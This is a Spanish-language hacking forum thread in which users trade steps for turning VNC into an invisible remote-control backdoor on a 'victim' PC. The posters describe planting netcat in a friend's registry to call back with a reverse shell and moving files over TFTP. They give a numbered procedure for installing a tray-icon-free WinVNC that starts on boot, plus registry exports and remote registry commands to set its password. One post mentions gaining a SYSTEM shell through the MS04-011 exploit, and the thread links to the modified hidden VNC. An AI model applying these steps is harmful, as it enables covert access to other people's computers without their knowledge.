Troyanizando VNC - Control Remoto Invisible

Iniciado por Gospel, 22 Septiembre 2004, 10:59 AM

0 Miembros y 1 Visitante están viendo este tema.

Locuras

Weno... os cuento. La verdad es q no todo ha salido a la perfección , pero algunas cosas si


Yo a mi amigo, ya le puse en el registro el netcat para que me llamase a mi ip al encender, yo tenía mi ordenador a la escucha, en el mismo puerto q mi amigo, pero no ha conectado...

el me ha solicitado asistencia remota, y yo le he abierto cmd.exe a mano, luego he arrancado el netcat yo a mano desde el cmd, y ya tenía su sell, he cerrado la asistencia remota

luego instalé el Servidor TFTP que me dijisteis, y ahora si, la transferencia de archivos se ha hecho de lujo y sin problemas xD eso es lo q mas me a alegrado  :D

transferí a su c:\vnc\2 archivos, y luego la dll al windows\system32

luego le he lanzado el winvnc.exe, mi amigo inmediatamente me ha advertido de que le ha salido una ventana, y estoy completamente seguro q el winvnc.exe que le he enviado era del paquete de NOTRAY, no se...

luego le he dicho q se meta a mi colega en www.whatismyip.com
mi colega me ha dicho la misma ip q tenía ayer... como no me fiaba de esto, pq el creo q tiene ip dinámica, pues le he pasado un archivo x messenger, y al hacer un netstat pues me ha revelado su ip del día de hoy

luego he abierto mi winvnccliente, el que zhyzura puso en su link

he puesto la ip de mi colega, pero de dice connection refused, tampoco estoy muy seguro de la ip de mi colega hoy... el netstat me decía una, pero en la web de www.whatismyip.com me daba otra diferente, pero esta ip dada por esta web, era la misma que nos daba ayer al meternos en esta web tambien, asi si que no estoy muy seguro de su ip...

de todas formas, en los 3 paquetes rar para bajar del vnc (el original, el NOTRAY, y el viewer de zhyzura) ambos tienen vcnviewer, en los 3 he puesto el nombre del host, la IP, las 2 que creo q son y no me conecta, aveces me pone conection refused, y conection timeout

ya que estaba dentro del ordenador de mi colega le he puesto en el registro la clave para que inicie el winvnc.exe del tirón, aunq ya os he dicho q le sale la ventana esta de poner un "0" y poner la clave, la misma que tenenos que configurar nosotros al principio de ponernos el programita, yo me he desinstalado en vnc, lo he vueltro a instalar, le he quitado la clave (xq antes habia puesto 1) y ahora le he dejado la casilla de auto conectada, un poco mas a la izquierda se puede apreciar la casilla en gris con el 0 puesto.

weno, haber q se os ocurre para decirme, acerca del uso del netcat y tb de lo del programa este... si todo esto q he escrito no lo entendeis bien, pues me preguntais y os lo aclaro, o si se os ocurre de como solucionarlo, pues tb me lo decis

saludos a todos

Locuras

vale, un segundo, me acabo de dar cuenta, de que si no ponemos una clave al configurar el winvnc.exe , no nos va a permitir una conexión... ya lo probaré...  ;)

de todas formas, ya os aviso que a mi colega si le aparece la ventana del winvnc al arrancárselo yo mismo desde la remote shell (ahora que yo me lo he configurado yo bien, y me queda pendiente sibírselo de nuevo por si acaso, habría que asegurarse de esto)  ::)

lo que mas me preocupa de todo esto, es lo del netcat,  :-[ q no me va muy bien, y weno... a ver q me podeis decir acerca de lo de averiguar lo de la ip de mi colega, o a ver que me podeis decir en general...  :-\  :'(

Gospel

A ver, tienes q realizar las operaciones en secuencia, tal y como está explicado:

1) Instalar el original VNC en el equipo atacante
2) Configurar el Servidor ORIGINAL en el propio equipo del atacante.
Necesitamos configurar el Servidor antes de instalárselo a la víctima o de otro modo, no podremos conectarnos remotamente!!
Así pues, ejecutamos WinVNC.exe y nos saldra una ventana de propiedades. Comprobamos q en Display Number pone 0 y en Contraseña agregamos una q queramos...
3) Sustituir el Servidor ejecutable original por uno modificado para q no muestre el Tray Icon.
4) Subir el Servidor VNC MODIFICADO a la víctima.

Si lo haces así, no debe aparecer ninguna ventana en el equipo víctima...

Salu2

Locuras

ok, lo haré

ya contaré experiencias

Gracias x contestar tu mismo Gospel



Saludos!

canallaman

Tengo problemas con una pc que tiene WIN98 no puedo hacer que el vnc se conecte, me dice que el servidor no tiene un password definido que este esta en blanco.
Le hice una captura de pantalla y es asi se ven las propiedades del VNC con el pass en blanco.
Le subi los archivos tal cual lo instale en mi pc por las dudas C:\ARCHIVOS DE PRGRAMAS\ORL\VNC, reemplaze el archivo por el que es invisible como dice en el tutorial.

A ver si esto esta bien, me fije en mi registro y exporte esto
en un archivo llamado vnc.txt

[HKEY_CURRENT_USER\Software\ORL\WinVNC3]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"Password"=hex:ae,d9,fd,73,49,ec,14,14
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000

luego con la shell que tengo de la pc de la victima hago lo siguiente:

C:\WINDOWS>regedit /l:c:\windows\system.dat vnc.txt

esta bien importado, al registro de la victima?

si es asi esta todo ta cual como esta instalado en mi pc y me dice que el password esta en blanco.


Man-In-the-Middle

conectate remotamente con su regedit, el problema me parece que tu passs, al momento de exportar no te write bien y te deja el bynary =000000000, tienes que modificarlo remotamente y de ahi hacer un reboot

enjoy
Man-In-the-Middle

canallaman

La maquina esta tiene win 98 como puedo hacer para modificar esta linea del registro?

Locuras

tienes q poner un password, el programa avisa que sin password no deja hacer conexciones  de ningun tipo

Man-In-the-Middle

Mira te mentiria, pero en mi caso para xp win200
me pongo como administrador

me mapeo

C:\net use x: \\10.10.0.x\C$ pwd /user:nombre_equipo_remoto\test

entro ami regedit

y me conecto remotamente

modifico

en el caso de win200
subes el regini
y en la shell
regini.exe -m \\10.10.1.253 vnc.ini
regini.exe -m \\10.10.1.253 vnc.ini(2 veces)

archivos upload (regini.exe, vnc.ini)


En caso de xp

Te instalas el vnc en tu mauina
Exportas el reg  del ORL

y en la shell

reg import vnc.reg.

archivos upload(vnc.reg)

espero que te sirva de algo

Enjoy

Man-In-the-Middle




Gospel

Bueno, estaba equivocado!!! Da bastantes problemas...

Cuando publique el minitutorial, habia obtenido la shell remota de forma manual, es decir, habia dejado en el equipo atacante el nc a la escucha y desde el equipo victima le devolvia la reverse shell. Una vez conseguida la shell remota, seguí los pasos uno a uno y me dieron éxito las dos veces q probé.
En este caso, la shell remota era con privilegios del usuario q me devolvió la reverse shell.

Ahora he cambiado de escenario. Me sitúo en una red local y para acceder a la shell remota de la víctima aprovecho la vulnerabilidad MS04-011 y obtengo una shell remota a través del exploit. El problema es q esta shell remota es con privilegios de SYSTEM.
He seguido los pasos y me da el error:

This server does not have a valid password enabled. Until a password is set, incoming connections cannot be accepted

Es decir, no guarda la contraseña.

También he probado a volcar mi carpeta VNC3 del registro en un vnc.reg. Le subo a la víctima los 3 archivos y también le subo este vnc.reg. Ejecuto "reg import vnc.reg" y despues pongo en marcha el vnc.
Lo siguiente es intentar conectarse con el vncviewer. HE probado con el original, con el de la carpeta de noIcon y con la version q posteo Zhyzura y me salta Error. Connection closed en los 3 casos.

Bueno, unas cuantas cosas:

1) Si sois tan amables, Zhyzura y Man in the Middle, detalladme el escenario con el q estáis trabajando. Como conseguis la shell remota, con q privilegios, cómo ejecutáis el server del vnc, etc

2) Man in the Middle!! Tienes bastante conocimiento respecto a este tema, pero te expresas de culo y no te entiendo nada bien  :P Si eres tan amable, postea tu experiencia paso a paso, con buena letra y q todos podamos enterarnos pq es muy interesante lo de añadir la clave del registro para poner la contraseña. Te lo digo en serio, eh!!

Hala, a ver si encontramos un método universal y publicamos un bonito tutorial.

Por mi parte, he subido al PAFileDB los archivos del VNC, tanto la version original como la versión modificada para q no muestre el Tray Icon. De esta forma, siempre podremos contar con ellos... ;)

VNC Original: http://ns2.elhacker.net/rojodos/descargas/pafiledb.php?action=download&id=63
VNC Modificado No Tray Icon: http://ns2.elhacker.net/rojodos/descargas/pafiledb.php?action=download&id=64

Salu2